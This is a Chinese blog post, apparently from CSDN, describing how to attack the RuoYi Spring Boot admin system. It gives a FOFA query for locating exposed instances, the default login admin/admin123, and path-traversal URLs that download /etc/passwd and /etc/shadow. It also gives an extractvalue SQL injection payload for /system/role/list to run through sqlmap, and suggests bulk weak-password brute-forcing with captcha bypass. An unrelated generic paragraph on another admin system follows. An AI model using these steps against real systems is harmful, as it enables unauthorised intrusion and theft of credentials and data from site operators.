若依管理系统漏洞利用

若依(RuoYi)管理系统 后台任意文件读取,SQL注入

 一、若依管理系统简介

 基于SpringBoot的权限管理系统 易读易懂、界面简洁美观。 核心技术采用Spring、MyBatis、Shiro没有任何其它重度依赖。直接运行即可用

二、若依管理系统后台任意文件下载

该漏洞需要登陆后台后进行测试,该管理系统多为默认账户密码

fofa搜索语句:app=”若依-管理系统”

账号:admin

密码:admin123

登陆成功后直接访问

http://目标网站url/common/download/resource?resource=/profile/../../../../etc/passwd
http://目标网站url//common/download/resource?resource=/profile/../../../../etc/shadow

三、若依管理系统SQL注入漏洞

该漏洞需要登陆后台后进行测试,该管理系统多为默认账户密码

直接burp抓包构造POST请求数据包(构建关键点)

1.POST请求

2.请求目录/system/role/list

3.请求POC(见下文)

POC:
pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params[beginTime]=&params[endTime]=&params[dataScope]=and
extractvalue(1,concat(0x7e,substring((*),1,32),0x7e))

POC我直接写的星号指定注入位置,可以直接放到sqlmap中去跑,不指定位置sqlmap跑不出来(可能是我太笨了)

ps:有兴趣的同学可以写个脚本去跑(大佬和小白就不用看了,闲人专享)

简单思路可以先去批量去跑弱口令,这个很快,验证码是可以通过验证码识别网站去绕过的,登陆到后台之后构建请求包,博主已经实现了,代码过于杂乱就不分享了。

  • 1
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Timo后台管理系统是一款广泛应用于企业内部的管理系统,据报道,近期发现了一些与安全性相关的漏洞。这些漏洞可能会使得系统面临一系列潜在威胁和风险。 首先,可能存在认证和授权方面的漏洞。如果恶意攻击者能够绕过身份验证和授权机制,他们可能会获取未经授权的权限并访问系统中的敏感信息。 其次,可能存在跨站脚本攻击(XSS)漏洞。这种漏洞可能允许攻击者在用户浏览器中注入恶意代码,从而导致被攻击用户的敏感信息泄露。 另外,可能存在跨站请求伪造(CSRF)漏洞。攻击者可以伪装成合法用户,并利用受害者的已登录状态发送伪装请求,执行恶意操作。 此外,还可能存在SQL注入漏洞,攻击者可以通过向数据库发送恶意脚本来获取敏感的数据库信息。 最后,系统可能存在未处理的错误输入漏洞。如果未对用户输入进行适当的过滤和验证,攻击者可以利用这些漏洞输入特定的恶意数据来破坏系统的功能或者获取非法访问权。 为了解决这些漏洞,开发者和管理员应当密切关注最新的安全警报和补丁,并及时进行修补和升级。同时,应加强对用户输入的过滤和验证,以防止恶意代码的注入。此外,建议加强系统的访问权限控制,确保只有授权用户才能访问系统中的敏感信息。最重要的是,定期对系统进行安全性审计和漏洞扫描,以及加强员工的安全意识教育和培训,以增强整个系统的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值